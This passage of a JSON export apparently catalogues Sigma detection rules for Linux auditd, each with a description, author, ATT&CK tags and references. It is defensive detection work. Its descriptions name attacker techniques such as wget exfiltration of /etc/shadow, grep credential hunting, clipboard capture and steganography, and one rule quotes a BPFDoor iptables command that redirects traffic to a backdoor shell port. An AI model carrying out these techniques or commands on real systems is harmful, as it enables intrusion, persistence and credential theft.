"1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", "value": "Linux Capabilities Discovery" }, { "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", "meta": { "author": "Pawel Mazur", "creation_date": "2022-02-03", "falsepositive": [ "Admin work like legit service installs." ], "filename": "lnx_auditd_systemd_service_creation.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" ], "tags": [ "attack.persistence", "attack.t1543.002" ] }, "related": [ { "dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", "value": "Systemd Service Creation" }, { "description": "Detects command line parameter very often used with coin miners", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-09", "falsepositive": [ "Other tools that use a --cpu-priority flag" ], "filename": "lnx_auditd_coinminer.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://xmrig.com/docs/miner/command-line-options", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", "value": "Possible Coin Miner CPU Priority Param" }, { "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-10-01", "falsepositive": [ "Legitimate usage of xclip tools" ], "filename": "lnx_auditd_clipboard_image_collection.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/xclip", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f200dc3f-b219-425d-a17e-c38467364816", "value": "Clipboard Collection of Image Data with Xclip Tool" }, { "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_ld_so_preload_mod.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.006" ] }, "related": [ { "dest-uuid": "633a100c-b2c9-41bf-9be5-905c1b16c825", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", "value": "Modification of ld.so.preload" }, { "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-11", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_steghide_extract_steganography.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", "value": "Steganography Extract Files with Steghide" }, { "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", "meta": { "author": "Rafal Piasecki", "creation_date": "2022-08-10", "falsepositive": [ "Legitimate ports redirect" ], "filename": "lnx_auditd_bpfdoor_port_redirect.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", "value": "Bpfdoor TCP Ports Redirect" }, { "description": "Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-11", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_steghide_embed_steganography.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", "value": "Steganography Hide Files with Steghide" }, { "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", "meta": { "author": "Pawel Mazur", "creation_date": "2022-01-22", "falsepositive": [ "Admin activity" ], "filename": "lnx_auditd_disable_system_firewall.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://firewalld.org/documentation/man-pages/firewall-cmd.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" ], "tags": [ "attack.t1562.004", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", "value": "Disable System Firewall" }, { "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-13", "falsepositive": [ "Legitimate use of screenshot utility" ], "filename": "lnx_auditd_screencaputre_xwd.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/xwd", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", "value": "Screen Capture with Xwd" }, { "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", "meta": { "author": "Rafal Piasecki", "creation_date": "2022-08-10", "falsepositive": [ "Unlikely" ], "filename": "lnx_auditd_bpfdoor_file_accessed.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" ], "tags": [ "attack.execution", "attack.t1106", "attack.t1059" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", "value": "BPFDoor Abnormal Process ID or Lock File Accessed" }, { "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-24", "falsepositive": [ "Legitimate usage of xclip tools" ], "filename": "lnx_auditd_clipboard_collection.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/xclip", "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", "value": "Clipboard Collection with Xclip Tool - Auditd" }, { "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-11-18", "falsepositive": [ "Legitimate usage of wget utility to post a file" ], "filename": "lnx_auditd_data_exfil_wget.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/wget", "https://gtfobins.github.io/gtfobins/wget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", "value": "Data Exfiltration with Wget" }, { "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Admin activity" ], "filename": "lnx_auditd_user_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", "value": "System Owner or User Discovery" }, { "description": "Detects relevant commands often related to malware or hacking activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-12-12", "falsepositive": [ "Admin activity" ], "filename": "lnx_auditd_susp_cmds.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "Internal Research - mostly derived from exploit code including code in MSF", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", "value": "Suspicious Commands Linux" }, { "description": "Detects attempts to record audio with arecord utility", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-04", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_audio_capture.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", "https://linux.die.net/man/1/arecord", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", "value": "Audio Capture" }, { "description": "Detects password policy discovery commands", "meta": { "author": "Ömer Günal, oscd.community, Pawel Mazur", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_auditd_password_policy_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/chage", "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", "https://man7.org/linux/man-pages/man1/passwd.1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1201" ] }, "related": [ { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", "value": "Password Policy Discovery" }, { "description": "Detects extracting of zip file from image file", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-09", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", "value": "Steganography Unzip Hidden Information From Picture File" }, { "description": "Detects appending of zip file to image", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-09", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_hidden_zip_files_steganography.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", "value": "Steganography Hide Zip Information in Picture File" }, { "description": "Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.\n", "meta": { "author": "IAI", "creation_date": "2023-03-06", "falsepositive": [ "Legitimate admin activity" ], "filename": "lnx_auditd_modify_system_firewall.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", "https://blog.aquasec.com/container-security-tnt-container-attack", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml" ], "tags": [ "attack.t1562.004", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "323ff3f5-0013-4847-bbd4-250b5edb62cc", "value": "Modify System Firewall" }, { "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-21", "falsepositive": [ "Legitimate use of screenshot utility" ], "filename": "lnx_auditd_screencapture_import.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://imagemagick.org/", "https://linux.die.net/man/1/import", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", "value": "Screen Capture with Import Tool" }, { "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", "meta": { "author": "Marie Euler, Pawel Mazur", "creation_date": "2020-05-18", "falsepositive": [ "Admin activity" ], "filename": "lnx_auditd_create_account.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" ], "tags": [ "attack.t1136.001", "attack.persistence" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", "value": "Creation Of An User Account" }, { "description": "Detects a reload or a start of a service.", "meta": { "author": "Jakob Weinzettl, oscd.community", "creation_date": "2019-09-23", "falsepositive": [ "Installation of legitimate service.", "Legitimate reconfiguration of service." ], "filename": "lnx_auditd_pers_systemd_reload.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" ], "tags": [ "attack.persistence", "attack.t1543.002" ] }, "related": [ { "dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", "value": "Systemd Service Reload or Start" }, { "description": "Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.", "meta": { "author": "Peter Matkovski, IAI", "creation_date": "2023-03-06", "falsepositive": [ "Admin or User activity are expected to generate some false positives" ], "filename": "lnx_auditd_unix_shell_configuration_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://objective-see.org/blog/blog_0x68.html", "https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack", "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml" ], "tags": [ "attack.persistence", "attack.t1546.004" ] }, "related": [ { "dest-uuid": "b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a94cdd87-6c54-4678-a6cc-2814ffe5a13d", "value": "Unix Shell Configuration Modification" }, { "description": "Detecting attempts to extract passwords with grep", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_find_cred_in_files.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", "value": "Credentials In Files - Linux" }, { "description": "Detects enumeration of local or remote network services.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-21", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_auditd_network_service_scanning.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3761e026-f259-44e6-8826-719ed8079408", "value": "Linux Network Service Scanning - Auditd" }, { "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": "No established falsepositives", "filename": "lnx_auditd_masquerading_crond.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", "value": "Masquerading as Linux Crond Process" }, { "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-06", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_hidden_files_directories.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", "value": "Hidden Files and Directories" }, { "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Legitimate administrative activity" ], "filename": "lnx_auditd_system_shutdown_reboot.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, "related": [ { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", "value": "System Shutdown/Reboot - Linux" }, { "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate use of archiving tools by legitimate user." ], "filename": "lnx_auditd_data_compressed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" ], "tags": [ "attack.exfiltration", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", "value": "Data Compressed" }, { "description": "Detects System Information Discovery commands", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-03", "falsepositive": [ "Likely" ], "filename": "lnx_auditd_system_info_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", "value": "System Information Discovery - Auditd" }, { "description": "Detects removing immutable file attribute.", "meta": { "author": "Jakob Weinzettl, oscd.community", "creation_date": "2019-09-23", "falsepositive": [ "Administrator interacting with immutable files (e.g. for instance backups)." ], "filename": "lnx_auditd_chattr_immutable_removal.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.002" ] }, "related": [ { "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", "value": "Remove Immutable File Attribute - Auditd" }, { "description": "Detects file and folder permission changes.", "meta": { "author": "Jakob Weinzettl, oscd.community", "creation_date": "2019-09-23", "falsepositive": [ "User interacting with files permissions (normal/daily behaviour)." ], "filename": "lnx_auditd_file_or_folder_permissions.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.002" ] }, "related": [ { "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", "tags": [ 